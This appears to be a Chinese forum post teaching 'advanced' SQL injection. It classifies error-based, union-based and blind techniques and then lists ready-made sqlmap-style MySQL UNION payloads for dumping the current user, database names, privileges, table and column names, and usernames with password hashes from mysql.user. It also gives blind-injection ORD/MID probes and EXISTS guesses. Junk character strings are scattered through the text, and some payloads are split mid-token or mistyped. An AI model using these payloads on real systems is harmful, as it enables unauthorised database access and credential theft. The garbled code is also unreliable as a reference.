放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。7 e* y% u+ O% E4 w8 o" ]
% o) Q8 G9 `' @, g这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
0 Q0 I& w$ x; F0 e- s
% i( d4 D" ^. u8 e" b3 J! m. m/ ^分类标准 分类 备注. m7 B* J5 ?8 b1 E8 I% p
按字段类型 整型注入,字符型注入
/ r1 k& w Q/ L按出现的位置 get注入,post注入,cookie注入,http header注入
# f- M6 H9 ~4 J Y然而高级注入是这样的9 X3 O/ y% X- E, O2 c% B' `- O; O- y
' @' e! B" m, N& g( ]+ Y1 z高级注入分类 条件
4 Z- `' c: Q! \, P* L) Oerror-based sql 数据库的错误回显可以返回,存在数据库,表结构9 G$ A; r3 C m \: A0 l
union-based sql 能够使用union,存在数据库,表结构0 f n; h4 G7 k/ H; W) e" [3 G. H8 O
blind sql 存在注入
$ T9 O* g+ N, x. F* d我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
, {0 v O1 b+ e2 @* V3 W" S- X B6 m/ {+ z6 j
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火' i/ Q; _/ U& G5 i+ P5 y
2 Y3 @$ X+ x+ Q% X0 G
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。8 P/ i6 b6 Z; V! o# p K( A5 y3 R
+ f4 S( _/ t; S1 }
这里用mysql说明5 I" p6 N/ y- W8 t$ |
% ?2 t& R3 z7 a/ R; O. R5 K" Y
e注入坛子里很多了,请看戳我或者再戳我1 z3 c# n* J! c
2 R& l5 ]- t, S2 F$ ?u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的" T; D6 Y2 u( L$ f( V) E: {
( S2 Q( L4 |2 O8 n( r5 Z获取当前数据库用户名% {6 G; R* c! X+ }- l- `7 A) F$ ~
X+ [3 S, A0 m: t& d" h
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C* e; j @$ A9 C2 F3 K6 Z
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL$ N) k% y9 |3 r \. r
L, NULL#
7 D* o+ }8 w8 t: {! R. k2 D/ J0 K& B0 [注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
7 }! F- ^+ D* b: m( c0 m! v2 }/ I* z ( h$ R, C* `/ b
获取数据库名
' L- O) R6 w+ g+ y$ ]
1 F5 `, w0 O+ }1 g9 WUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#9 F' B3 `6 R# C2 f- D9 s: m
获取所有用户名
5 V3 [4 k3 {( K4 f
4 |" H3 ~' A" R. U$ _7 mUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#6 N! _3 \! \: W7 e
查看当前用户权限# i( `! F5 K: h( t, q
0 ^" t3 E6 B% Q' O/ Y9 m* @UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#& D8 j& F; [/ L$ K& B0 ~# M* P
尝试获取密码,当然需要有能读mysql数据库的权限
( t2 D: V0 k+ J8 R. E/ ^ ; o8 X* Z0 v( M" l; c! W
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user## @7 E: |( b3 R4 s1 ~& w9 f6 j
获取表名,limit什么的自己搞啦
' r7 ?: T7 n; K3 } 8 Y: w( x ~) b; n C
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#! F* o; e; `- l' d+ Y$ G
获取字段名及其类型
9 t8 Z- A* A1 o8 u0 z: aUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
& W2 z& i6 K0 ~% d7 y 6 F" w+ Z4 ^0 } _
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。6 j* |- N. Y( I* S- ?
$ {! z! h) [0 f: {, R& y" j如:) [+ ^; D: U' V
获取当前用户名
$ _- Z, U. r# }# M/ R( Y% h5 ^5 q
/ g$ y5 |- H7 C3 E* ~4 R& RAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
1 E- ^2 G' E" V6 H; r9 w获取当前数据库
: p: Q4 ]. [ F3 T) j' G F w( b8 Q1 \2 y" f" k( B
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
; ~1 {9 I. w6 J: n获取表名
; ]* D+ A/ z- v* P2 p
$ ~. l: J' T- H; _8 e1 b" ^AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51* N. B3 g7 Z3 W6 A: m
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。( H2 ?! }. n+ c- b* u1 F3 o0 U
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。$ S/ x% r6 C9 y6 n
爆表
; u: t8 v# n- A" A. {+ h r ' A4 k& I% I, V3 u! d
AND EXISTS(select * from table)
8 E; H9 O6 |7 J0 v. H# g爆字段/ s; j- }' B! A9 V% e9 W! R
+ S0 c& r( A& u( M2 x+ V
AND EXISTS(select pwd from table)) m( l8 r, S7 o% \2 B+ I1 m
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
* P9 v* O1 w4 b8 b- O ; g+ e- E; j0 s
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。$ S& X# u% d4 |/ P: X
|